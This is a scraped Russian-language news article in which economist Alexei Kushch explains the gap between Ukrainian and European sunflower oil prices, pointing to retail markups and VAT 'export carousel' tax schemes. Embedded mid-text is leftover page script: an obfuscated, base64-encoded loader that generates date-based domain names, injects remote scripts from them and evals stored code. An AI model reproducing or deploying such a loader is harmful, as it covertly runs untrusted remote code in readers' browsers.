Экономист объяснил разницу цен на подсолнечное масло в Украине и Европе

Почему украинское подсолнечное масло продают в Европе вдвое дешевле.

Украина является одним из основных мировых производителей растительного масла, однако в Украине цены на подсолнечное масло отечественного производства в два раза выше, чем в других странах.

Об этом в Facebook написал экономист Алексей Кущ.

«Социальные сети в Украине, наконец, увидели то, о чем мы пишем уже несколько месяцев: удивительную разницу между ценами на подсолнечное масло в зарубежных супермаркетах и украинских», — сообщил эксперт.

По словам Алексея Куща, из 20,9 млн тонн подсолнечного масла на международном рынке примерно 6,7 млн тонн в маркетинговом году 2019/2020 пришлось на Украину.

«Наша страна – номер один среди мировых производителей, хотя нам на пятки и наступает РФ (доля россиян — 5,8 млн тонн). Суммарно на две указанные страны приходится почти 60% мирового рынка.  При этом объемы переработки в Украине существенно превышают внутренние потребности: из указанных 6,7 млн тонн сами украинцы в лучшем случае потребляют за год всего 0,4 млн», — подчеркнул эксперт.

По словам экономиста, сейчас за условный литр подсолнечного масла в крупном опте на экспорт стоит примерно один доллар за литр (около 27-28 грн), в то же время на внутреннем рынке в розницу литр обходится в два доллара (более 50 гривен).

«Существуют законы рынка, когда розница всегда дороже оптовой партии как за счет фактора объема продаж, так и по причине стоимости упаковки и дистрибьюции. Но это не может объяснить разницу в цене в два раза, должны быть системные факторы, которые и формируют указанный выше зазор», — отметил экономист. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

По словам эксперта, что торговые сети формируют свой профицит не за счет увеличения объемов продаж, а за счет торговой наценки.

«Объясняется это низким платежеспособным спросом населения и фактором так называемых «товаров Гиффена». Простыми словами, снизив цену и торговую маржу до минимума, торговые сети не компенсируют потери ростом объемов проданного товара. Поэтому лучше продавать меньше, но дороже: кому надо, тот купит даже переплачивая. И украинцы переплачивают, покупая несколько бутылок подсолнечного масла в месяц. Фактор «товара Гиффена» означает, что есть группа социальных товаров, спрос на которые растет при увеличении цены, хоть это и звучит на первый взгляд парадоксально», — отметил Алексей Кущ.

Эксперт подчеркнул, что если люди ожидают рост цен, они запасаются впрок даже по завышенным ценам.

В 2019 году ГФС провела детальное изучение баланса поступлений в бюджет со стороны 42 крупнейших производителей масла и продавцов «семечки» и суммами возмещения НДС, выплаченных им из государственного бюджета. Оказалось, что сумма уплаченного этими компаниями в бюджет НДС была на 32,2 млрд грн меньше суммы возмещенного им налога со стороны государства (за счет бюджетных средств).Более того, экспорт семян подсолнечника и подсолнечного масла стал источником массовой оптимизации налогообложения – так называемые «экспортные карусели, или нетипичный экспорт». Схема выглядит примерно так: крупная торговая сеть продает товары, и ее обязательства перед бюджетом по уплате НДС составляют один миллиард гривен. Но платить в бюджет не хочется. Тогда торговая сеть покупает за 6 млрд грн подсолнечное масло/семечку. На эту сумму формируется налоговый кредит по НДС в размере 1 млрд грн, то есть в сальдовом остатке обязательства ритейлера перед государством равны нулю. В дальнейшем эта компания экспортирует семечку и масло на внешние рынки без уплаты налогов, так как НДС при экспорте не начисляется. Полученная выгода в один ярд делится торговой сетью и продавцом семечки/масла пополам, — раскрывает схему эксперт.

Цены на подсолнечное масло и сахар в Украине за год выросли почти вдвое. По данным Госстата, в июне этого года подсолнечное масло стоило на 80% дороже, чем в июне 2020 года.

«При этом те же самые украинские торговые сети, которые впаривают нам масло по 50 грн, на схемах с «нетипичным экспортом» масла и семечки минимизируют свое налогообложение на миллиарды гривен в год», — отметил экономист. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/ekonomist-obyasnil-raznitsu-tsen-na-podsolnechnoe-maslo-v-ukraine-i-evrope/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top